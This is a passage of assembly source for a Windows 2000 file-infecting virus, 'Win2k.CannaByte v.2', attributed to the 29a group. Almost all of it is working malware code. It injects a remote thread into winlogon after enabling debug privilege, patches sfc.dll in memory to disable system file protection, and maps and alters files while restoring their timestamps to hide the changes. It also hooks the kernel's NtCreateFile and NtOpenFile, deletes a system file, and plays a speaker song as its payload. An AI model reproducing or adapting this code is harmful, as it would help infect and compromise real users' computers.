;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;UnprotectMem sets as writable zone since esi to esi + ecx in ebx process.
;in:
; eax -> base of kernel
; esi -> dir of memory that will be writable.
; ecx -> bytes of that memory.
; ebx -> handle of the process where is the memory.If 0 this process
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
UnprotectMem:
or ebx,ebx
jne NoThisProcess
push eax
push esi
push ecx
GezApi eax,GetCurrentProcessCRC,GCPNameLen
;eax -> GetCurrentProcess
call eax
;eax = hand of this process
mov ebx,eax
pop ecx
pop esi
pop eax
NoThisProcess:
push ebx
push esi
push ecx
GezApi eax,VirtualProtectExCRC,VPNameLen
;eax -> VirtualProtectEx
pop ecx
pop esi
pop ebx
;ebx = hand of process
;esi = dir
;ecx = nbytes
push eax ;space for receiving lpflOldProtect out parameter
push esp
push PAGE_EXECUTE_READWRITE
push ecx
push esi
push ebx
call eax
pop eax ;we remove space that we reserve in the stack for out parameter
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;GetLibrarys and FreeLibrarys get and free some librarys :P
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GetLibrarys:
pushad
;first,ill try to get ntdll base from PEB structure
mov eax,dword ptr fs:[30h] ;PEB pointer
mov eax,dword ptr [eax + 0ch] ;PEB_LDR_DATA
mov eax,dword ptr [eax + 1ch] ;LIST_ENTRY
mov eax,dword ptr [eax + 8h] ;ntdll.dll base
mov [ebp + Ntdll],eax
mov eax,[ebp + NtKernel]
GezApi eax,LoadLibraryACRC,LLNameLen
push eax
lea ebx,[ebp + advapi]
push ebx
call eax
mov [ebp + NtAdvapi],eax
lea ebx,[ebp + psapi]
push ebx
call dword ptr [esp + 4]
mov [ebp + NtPsapi],eax
lea ebx,[ebp + rasapi]
push ebx
call dword ptr [esp + 4]
mov [ebp + NtRasapi],eax
lea ebx,[ebp + imagehlp]
push ebx
call dword ptr [esp + 4]
mov [ebp + NtImagehlp],eax
pop eax
popad
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
FreeLibrarys:
pushad
mov eax,[ebp + NtKernel]
GezApi eax,FreeLibraryCRC,FLNameLen
push eax
push dword ptr [ebp + NtAdvapi]
call dword ptr [esp + 4]
push dword ptr [ebp + NtPsapi]
call dword ptr [esp + 4]
push dword ptr [ebp + NtRasapi]
call dword ptr [esp + 4]
push dword ptr [ebp + NtImagehlp]
call dword ptr [esp + 4]
pop eax
popad
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;GetWinlogon in:none out: WinlogonHand with winlogon process handle
; eax = 0 if no error
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GetWinlogon:
pushad
mov ecx,200h
SaveSpaceSearchingWinlogon:
push 00000000h
loop SaveSpaceSearchingWinlogon
;esp -> array of id of processes
mov eax,esp
lea ebx,[ebp + Needed]
push ebx
push 4*200h
push eax
mov eax,[ebp + NtPsapi]
GezApi eax,EnumProcessesCRC,EPSNameLen
call eax
dec eax
jnz GetWinlogonOutError_
;esp -> array
mov esi,esp
lodsd
SearchWinlogon:
lodsd
push esi
or eax,eax
jz GetWinlogonOutError
;vvv
mov [ebp + WinlogonID],eax
push eax
xor eax,eax
push eax
mov eax,10h or 400h or 20h or 2h or 8h
push eax
mov eax,[ebp + NtKernel]
GezApi eax,OpenProcessCRC,OPNameLen
call eax
or eax,eax
jz NoWinlogonFound
;eax = process handle
mov [ebp + WinlogonHand],eax
lea ebx,[ebp + Needed]
push ebx
push 4
lea ebx,[ebp + WinlogonModuleHand]
push ebx
push eax
mov eax,[ebp + NtPsapi]
GezApi eax,EnumProcessModulesCRC,EPMNameLen
call eax
dec eax
jnz NoWinlogonFound
push 50
lea eax,[ebp + WinlogonModuleName]
push eax
push dword ptr [ebp + WinlogonModuleHand]
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtPsapi]
GezApi eax,GetModuleBaseNameACRC,GMBNNameLen
call eax
lea esi,[ebp + WinlogonModuleName]
lodsd
or eax,20202020h
cmp eax,'lniw'
winl equ $ - 4
jne NoWinlogonFound
lodsd
or eax,20202020h
cmp eax,'nogo'
ogon equ $ - 4
jne NoWinlogonFound
;^^^
WinLogonFound:
pop esi
GetWinlogonOut:
add esp,4*200h
popad
xor eax,eax
ret
NoWinlogonFound:
pop esi
jmp SearchWinlogon
GetWinlogonOutError:
pop esi
GetWinlogonOutError_:
add esp,4*200h
popad
xor eax,eax
inc eax
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;AttackWinlogon in:none
; out: eax = 1 error eax = 0 no error
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
AttackWinlogon:
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push evirus - svirus
push 0
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,VirtualAllocExCRC,VANameLen
call eax
or eax,eax
jz AttackWinlogonError
mov [ebp + WinlogonVirusBase],eax
mov ecx,[ebp + NtKernel]
mov ebx,[ebp + WinlogonHand]
lea edx,[ebp + svirus]
mov esi,evirus - svirus
Writez ecx,ebx,eax,edx,esi
or eax,eax
jz AttackWinlogonError
push 0
push 0
lea eax,[ebp + Needed]
push eax;pointer to a variable to be passed to the thread function
mov eax,[ebp + WinlogonVirusBase]
add eax,WinlogonCode - svirus
push eax
push 0 ;stack size
push 0
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,CreateRemoteThreadCRC,CRTNameLen
call eax
or eax,eax
jz AttackWinlogonError
AttackWinlogonNoError:
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
call eax
xor eax,eax
ret
AttackWinlogonError:
push dword ptr [ebp + WinlogonHand]
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
call eax
xor eax,eax
inc eax
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
WinlogonCode:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;When i inject code to winlogon,i create a remote thread that will start execution here
pop eax ;remove parameter passed
callz WinlogonCodeDoff
WinlogonCodeDoff:
pop ebp
sub ebp,offset WinlogonCodeDoff
SfcDisable:
lea eax,[ebp + sfc]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,LoadLibraryACRC,LLNameLen
call eax
or eax,eax
jz ErrorSfcDisable
mov [ebp + NtSfc],eax
mov esi,[eax + 3ch]
add esi,eax
;esi -> PE
movzx eax,word ptr [esi + 14h];size of optional
mov ecx,[eax + esi + 18h + 10h];size of section
mov esi,[eax + esi + 18h + 0ch];virtual address of first section of sfc.dll
add esi,dword ptr [ebp + NtSfc]
;esi -> code section
SearchCodeToPatch:
pushad
lea edi,[ebp + CodeToSearch]
mov ecx,11
rep cmpsb
popad
je CodeToPatchFound
inc esi
loop SearchCodeToPatch
jmpz ErrorSfcDisable
CodeToPatchFound:
;now we patch code with a call to ExitThread
push esi
mov eax,[ebp + NtKernel]
GezApi eax,ExitThreadCRC,ETNameLen
pop esi
mov [ebp + PatchExitThreadDir],eax
push esi
;i unprotect the mem where i go to patch
;UnprotectMem
; eax -> base of kernel
; esi -> dir of memory that will be writable.
; ecx -> bytes of that memory.
; ebx -> handle of the process where is the memory.If 0 this process
mov eax,[ebp + NtKernel]
mov ebx,0
mov ecx,_PatchCode - PatchCode
callz UnprotectMem
pop esi
mov edi,esi
lea esi,[ebp + PatchCode]
mov ecx,_PatchCode - PatchCode
PatchIt:
movsb
loop PatchIt
;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel]
GezApi eax,ExitThreadCRC,ETNameLen
push 0
call eax
;;;;;;;;;;;;;;;;;;;;;;
sfc db 'sfc.dll'
NtSfc dd 0
CodeToSearch db 6Ah,01h,6Ah,01h,0FFh,33h,0FFh,73h,04h,0FFh,15h
PatchCode:
push 0
mov eax,11111111h
PatchExitThreadDir equ dword ptr $ - 4
call eax
_PatchCode:
ErrorSfcDisable:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;SECOND VERSION IMPROVEMENT FOR SFC DISABLE
;In the first version the method used for sfc disabling is for win2k only,so in this
;version,if the first one fails, we will try other trickz.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;
SfcDisableImprovement:
;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel]
GezApi eax,ExitThreadCRC,ETNameLen
push 0
call eax
;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;End of code for injecting in winlogon process
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;MapFile ;it maps the file in _WIN32_FIND_DATA
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MapFile:
ChangeAttributesOfFile:
lea edi,[ebp + _WIN32_FIND_DATA.WFD_szFileName]
push 80h
push edi
mov eax,[ebp + NtKernel]
GezApi eax,SetFileAttributesACRC,SFANameLen
call eax
push 0
push 0
push 3
push 0
push 1
push 0C0000000h ;read and write access to file
lea eax,[ebp + _WIN32_FIND_DATA.WFD_szFileName]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,CreateFileACRC,CFNameLen
call eax
inc eax
or eax,eax
jnz np1
ret
np1:
dec eax
mov [ebp + FileHandle],eax
push 0
mov eax,[ebp + _WIN32_FIND_DATA.WFD_nFileSizeLow]
push eax
push 0
push 4
push 0
push dword ptr [ebp + FileHandle]
mov eax,[ebp + NtKernel]
GezApi eax,CreateFileMappingACRC,CFMNameLen
call eax
or eax,eax
jz CloseFile
mov [ebp + MappingHandle],eax
push dword ptr [ebp + _WIN32_FIND_DATA.WFD_nFileSizeLow]
push 0
push 0
push 000F001Fh ;access
push eax ;MappingHandle
mov eax,[ebp + NtKernel]
GezApi eax,MapViewOfFileCRC,MVFNameLen
call eax
or eax,eax
jz CloseMapping
mov [ebp + ViewHandle],eax
ret
;;;;;;;;;;;;;;;;;;;;;;
CloseAll:;close file opened with MapFile
mov eax,[ebp + NtKernel]
GezApi eax,UnmapViewOfFileCRC,UVFNameLen
push dword ptr [ebp + ViewHandle]
call eax
CloseMapping:
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
push dword ptr [ebp + MappingHandle]
call eax
CloseFile:
RestoreAttributes:
lea eax,dword ptr [ebp + _WIN32_FIND_DATA.WFD_ftLastWriteTime]
push eax
lea eax,dword ptr [ebp + _WIN32_FIND_DATA.WFD_ftLastAccessTime]
push eax
lea eax,dword ptr [ebp + _WIN32_FIND_DATA.WFD_ftCreationTime]
push eax
push dword ptr [ebp + FileHandle]
mov eax,[ebp + NtKernel]
GezApi eax,SetFileTimeCRC,SFTNameLen
call eax
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
push dword ptr [ebp + FileHandle]
call eax
push dword ptr [ebp + _WIN32_FIND_DATA.WFD_dwFileAttributes]
lea eax, [ebp+ _WIN32_FIND_DATA.WFD_szFileName]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,SetFileAttributesACRC,SFANameLen
call eax
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;PayloadRing0.This function is the payload of the virus in ring0.
;When win32k.sys is loaded a song starts in internal speaker.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PayloadRing0:
Do equ 600
Re equ 674 ;(9/8) * Do ;1.125*Do
Mi equ 750 ;(5/4) * Do ;1.25*Do
Fa equ 798 ;(4/3) * Do ;1.33*Do
Sol equ 900 ;(3/2) * Do ;1.5*Do
La equ 996 ;(5/3) * Do ;1.66*Do
Si_ equ 1124;(15/8)* Do ;1.875*Do
Do2 equ 1220
Zilence equ 1
pushfd
pushad
;;;;;;;;;;;;;;;;;;;;;;;
cli
in al, 61h ;save byte in 61h
push ax
cli
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
lea esi,word ptr [ebp + Song]
WhatIfGodSmokedCannabis:
lodsw
mov cx,ax
lodsw
mov dx,ax
or cx,cx
je EndSong
callz sound
jmpz WhatIfGodSmokedCannabis
EndSong:
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
callz Silence
pop ax ; Restore information byte in port 61h
out 61h, al
sti
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
popad
popfd
ret
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
sound: ;cx = frec dl = duration in second(no more than 13 sec)
pushad
push dx
set_ppi:
mov al, 10110110b ; channel 2
out 43h, al ; operation and mode 3
set_freq:
cmp cx,Zilence
je IsASilence
mov dx,12h
mov ax,34dch
div cx ; data for frec in ax: 1234dch / (cx = frec)
out 42h, al
mov al, ah
out 42h, al
active_spk:
or al, 00000011b
out 61h, al
xor eax,eax
pop ax ;al = duration in sec
callz WaitX
popad
ret
IsASilence:
callz Silence
pop ax ;al = duration in sec
callz WaitX
popad
ret
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
WaitX: ;eax = multiplicator < 19
pushad
mov ecx,1500000h
VelAdjust equ dword ptr $ - 4
mul ecx;*eax
mov ecx,eax
loop $
popad
ret
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
Silence:
pushad
in al, 61h
and al, 11111100b ; 0FCh put off speaker
out 61h, al
popad
ret
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
paystrings:
db "Win2k.CannaByte v.2 by Super and Vallez for 29a",0dh,0ah
db "The name of this virus is CannaByte!!!",0dh,0ah
db "I hate avs changed viruses's names",0dh,0ah
db "Plz,no change the name of this ;)",0
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
TitleSong:
db "What if god smoked cannabis?",0
Song:
dw Mi,6,Mi,6,Mi,6,Fa,12,Zilence,3,Mi,6,Mi,6,Mi,6,Mi,6,Re,6,Re,6,Do,9
dw Mi,6,Mi,6,Mi,6,Fa,12,Zilence,3,Mi,6,Mi,6,Mi,6,Mi,6,Re,6,Re,6,Do,9
dw Mi,6,Mi,6,Mi,6,Mi,6,Fa,12,Zilence,4,Mi,6,Mi,6,Mi,6,Mi,6,Re,6,Re,6,Do,9
dw Mi,6,Mi,6,Mi,6,Mi,6,Fa,12,Zilence,4,Mi,6,Mi,6,Mi,6,Mi,6,Re,6,Re,6,Do,9
dw Mi,15,Zilence,2,Mi,15,Zilence,2,Do,6,Re,6,Mi,6,Mi,6,Zilence,4
dw Mi,15,Zilence,2,Mi,15,Zilence,2,Do,6,Re,6,Mi,6,Mi,6,Zilence,4
dw Mi,15,Zilence,2,Mi,15,Zilence,2,Mi,6,Mi,6,Mi,6,Zilence,6
dw Sol,6,La,6,Si_,9,Mi,6,Mi,6,Fa,6,Sol,12,Zilence,3
dw Sol,6,La,6,Si_,9,Mi,6,Mi,6,Fa,6,Sol,12,Zilence,4
dw Sol,6,La,6,Si_,9,Mi,12,Mi,9,Fa,6,Sol,6,Zilence,1
dw Sol,6,Sol,6,Sol,6,Sol,6,Fa,6,Mi,6,Re,6,Do,18,Zilence,3
dw Sol,9,Sol,9,Sol,9,Sol,9,Fa,9,Mi,9,Re,9,Do,18,0,0
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;touch_privilege: i got this function from Ratter/29a's document about infection of winlogon.
;The function enable a privilege for me,and ill use to enable SeDebugPrivilege for later ill
;be able to modify winlogon memory space.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
touch_privilege:
mov ebx, ebp
touch_privilege_ proc near
local process_token:DWORD
local privilege_luid:QWORD
local token_privilegez:TOKEN_PRIVILEGES
pushad
@SEH_SetupFrame <jmp touch_privilege_end>
xchg eax, edi
call dword ptr [ebx+tGetCurrentProcess]
lea edx, [process_token]
push edx
push TOKEN_ADJUST_PRIVILEGES
push eax
call dword ptr [ebx+tOpenProcessToken]
dec eax
jnz touch_privilege_end
lea edx, [token_privilegez.TP_luid]
push edx
push esi
push eax
call dword ptr [ebx+tLookupPrivilegeValueA]
dec eax
jnz touch_privilege_close_p_token
push eax
push eax
push type(TOKEN_PRIVILEGES)
lea edx, [token_privilegez]
push 1
pop dword ptr [edx]
mov dword ptr [edx.TP_attribz], edi
push edx
push eax
push dword ptr [process_token]
call dword ptr [ebx+tAdjustTokenPrivileges]
touch_privilege_close_p_token:
push eax
push dword ptr [process_token]
call dword ptr [ebx+tCloseHandle]
pop eax
touch_privilege_end:
@SEH_RemoveFrame
mov dword ptr [esp.Pushad_eax], eax
popad
leave
retn
touch_privilege_ endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;MapFileRing0 maps a file using kernel mode apis. As MapFile fuction for user
;mode, MapFileRing0 has a CloseAllRing0 function for saving changes and close handles
;MapFile get the name and directory handle from FileNameRing0 and RootDirectoryRing0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MapFileRing0:
pushad
;objects_attributes struc
; oa_length dd ? ;lenght of this structure
; oa_rootdir dd ?
; oa_objectname dd ? ;name of the object
; oa_attribz dd ? ;attributes of the object
; oa_secdesc dd ?
; oa_secqos dd ?
;objects_attributes ends
;
;pio_status struc
; ps_ntstatus dd ?
; ps_info dd ?
;pio_status ends
mov [ebp + FileAttributesRing0.oa_length],24
mov eax,[ebp + RootDirectoryRing0]
mov [ebp + FileAttributesRing0.oa_rootdir],eax
lea eax,[ebp + FileNameRing0]
mov [ebp + FileAttributesRing0.oa_objectname],eax
mov dword ptr [ebp + FileAttributesRing0.oa_attribz],OBJ_CASE_INSENSITIVE
mov dword ptr [ebp + FileAttributesRing0.oa_secdesc],0
mov dword ptr [ebp + FileAttributesRing0.oa_secqos],0
push FILE_OPEN_FOR_BACKUP_INTENT or \
FILE_SYNCHRONOUS_IO_NONALERT or \
FILE_NON_DIRECTORY_FILE ;OpenOptions
push FILE_SHARE_READ or \
FILE_SHARE_WRITE ;Share access
lea eax,[ebp + io_statusRing0]
push eax
lea eax,[ebp + FileAttributesRing0]
push eax
push FILE_READ_DATA or\
FILE_WRITE_DATA or\
FILE_APPEND_DATA or\
STANDART_RIGTHS_REQUIRED ;desired access
lea eax,[ebp + FileHandRing0]
push eax
call dword ptr [ebp + ZwOpenFilez] ;I get a handle to the file
test eax,eax
jne ErrorMappingRing0
mov eax,[ebp + FileHandRing0]
push eax
push SEC_COMMIT ;allocation attributes
push PAGE_READWRITE ;page protection
push 00000000h ;maximun size
push 00000000h ;objects attributes NULL
push SECTION_QUERY or \
SECTION_MAP_WRITE or \
SECTION_MAP_READ or \
STANDART_RIGTHS_REQUIRED ;desired access
lea eax,[ebp + SectionHandRing0]
push eax
call dword ptr [ebp + ZwCreateSectionz] ;I get a handle to a created section
test eax,eax
je np1Ring0
callz Close1Ring0
jmpz ErrorMappingRing0
np1Ring0: ;no problem getting section so continue
mov dword ptr [ebp + SectionBaseAddressRing0],0
mov dword ptr [ebp + SectionOffsetRing0],0
mov dword ptr [ebp + SectionOffsetRing0 + 4],0
mov dword ptr [ebp + SectionViewSizeRing0],0
push 00000004h
push 00000000h
push 00000001h
lea eax,[ebp + SectionViewSizeRing0]
push eax
lea eax,[ebp + SectionOffsetRing0]
push eax
push 00000000h
push 00000000h
lea eax,[ebp + SectionBaseAddressRing0]
push eax
push 0FFFFFFFFh ;i specify the caller process,...i suppose thought im in ring0 this will
;not give problems.
mov eax,[ebp + SectionHandRing0]
push eax
call dword ptr [ebp + ZwMapViewOfSectionz] ;I get a view of the section
test eax,eax
je NoErrorMappingRing0
callz Close2Ring0
jmpz ErrorMappingRing0
NoErrorMappingRing0:
popad
mov eax,[ebp + SectionBaseAddressRing0]
ret
ErrorMappingRing0:
popad
xor eax,eax
ret
;;;;;;;;;;;;;;;;;;;;;;
CloseAllRing0:
Close3Ring0:
push dword ptr [ebp + SectionBaseAddressRing0]
push 0FFFFFFFFh
call dword ptr [ebp + ZwUnmapViewOfSectionz] ;I unmap the view of the section
Close2Ring0:
push dword ptr [ebp + SectionHandRing0]
call dword ptr [ebp + ZwClosez] ;I close the hand to the section
Close1Ring0:
push dword ptr [ebp + FileHandRing0]
call dword ptr [ebp + ZwClosez] ;I close the hand to the file
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;GetApisRing0 gets some apis coz we need to be fast when we r in the hook rutine,or the
;system will go slowly...We cant to be using all time GezApi
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GetApisRing0:
pushfd
pushad
mov eax,[ebp + Ntoskrnl]
GezApi eax,ZwUnmapViewOfSectionCRC,ZUVOSNameLen
mov [ebp + ZwUnmapViewOfSectionz],eax
mov eax,[ebp + Ntoskrnl]
GezApi eax,ZwCloseCRC,ZCNameLen
mov [ebp + ZwClosez],eax
mov eax,[ebp + Ntoskrnl]
GezApi eax,ZwMapViewOfSectionCRC,ZMVOSNameLen
mov [ebp + ZwMapViewOfSectionz],eax
mov eax,[ebp + Ntoskrnl]
GezApi eax,ZwOpenFileCRC,ZOFNameLen
mov [ebp + ZwOpenFilez],eax
mov eax,[ebp + Ntoskrnl]
GezApi eax,ZwCreateSectionCRC,ZCSNameLen
mov [ebp + ZwCreateSectionz],eax
popad
popfd
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;DeleteWin32ksy will delete win32k.sy file if still not deleted
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
DeleteWin32ksy:
pushfd
pushad
;From Ring3 part we have in Buffer system32 path in ansi string. We will use StringRing0
;for creating a unicode string with win32k.sy name.
lea edi,[ebp + StringRing0]
lea esi,[ebp + StartUnicode]
mov ecx,8
xor eax,eax
CopyStartUnicode:
movsb
loop CopyStartUnicode
lea esi,[ebp + Buffer]
CalcLenString
push ecx
xor eax,eax
CopyPathSystem32:
movsb
stosb
loop CopyPathSystem32
mov al,'\'
stosb
xor eax,eax
stosb
lea esi,[ebp + win32ksy]
CalcLenString
xor eax,eax
CopyFileNameWin32ksy:
movsb
stosb
loop CopyFileNameWin32ksy
;we have in StringRing0 'pathsystem32\win32k.sy'
pop ecx ;len of path of system32 in ansi
shl ecx,1 ;len in unicode
add ecx,28 ;len of that path + len of \??\ and win32k.sy name in ecx
mov word ptr [ebp + FileNameRing0.us_Length],cx
mov word ptr [ebp + FileNameRing0.us_MaximumLength],cx
lea eax,[ebp + StringRing0]
mov [ebp + FileNameRing0.us_Buffer],eax
;usually deletion of files is done with a specific call to NtSetInformationFile. With this
;call the file is deleted when last handle to it is closed. However ill use other
;undocumented api,ZwDeleteFile. With ZwDeleteFile the file is deleted without waiting
;last handle was closed.
lea eax,[ebp + FileNameRing0]
mov dword ptr [ebp + FileAttributesRing0.oa_objectname],eax
mov dword ptr [ebp + FileAttributesRing0.oa_length] ,24
mov dword ptr [ebp + FileAttributesRing0.oa_rootdir],0
mov dword ptr [ebp + FileAttributesRing0.oa_attribz],40h
mov dword ptr [ebp + FileAttributesRing0.oa_secdesc],0h
mov dword ptr [ebp + FileAttributesRing0.oa_secqos] ,0h
lea eax,dword ptr [ebp + FileAttributesRing0]
push eax
mov eax,[ebp + Ntoskrnl]
GezApi eax,ZwDeleteFileCRC,ZDFNameLen
call eax ;file must be deleted
popad
popfd
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;UnhookWhile and RehookAgain put off and put on the hook
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;NtCreateFileAddr
;NtOpenFileAddr
;NtCreateFileEntryAddr
;NtOpenFileEntryAddr
;;;;;;;;;;;;;;;;;;;;;;
UnhookWhile:
;;;;;;;;;;;;
pushad
mov eax,[ebp + NtCreateFileAddr]
mov ebx,[ebp + NtCreateFileEntryAddr]
mov [ebx],eax
mov eax,[ebp + NtOpenFileAddr]
mov ebx,[ebp + NtOpenFileEntryAddr]
mov [ebx],eax
popad
ret
;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;
RehookAgain:
;;;;;;;;;;;;
pushad
lea eax,[ebp + NtCreateFileHookRutine]
mov ebx,[ebp + NtCreateFileEntryAddr]
mov [ebx],eax
lea eax,[ebp + NtOpenFileHookRutine]
mov ebx,[ebp + NtOpenFileEntryAddr]
mov [ebx],eax
popad
ret
;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Some Variables
Needed dd 0
NtKernel dd 0
NtAdvapi dd 0
NtPsapi dd 0
NtRasapi dd 0
Ntdll dd 0
NtImagehlp dd 0
advapi db 'advapi32.dll',0
psapi db 'psapi.dll',0
rasapi db 'rasapi32.dll',0
imagehlp db 'imagehlp.dll',0
win32ksys db 'win32k.sys',0
win32ksy db 'win32k.sy',0
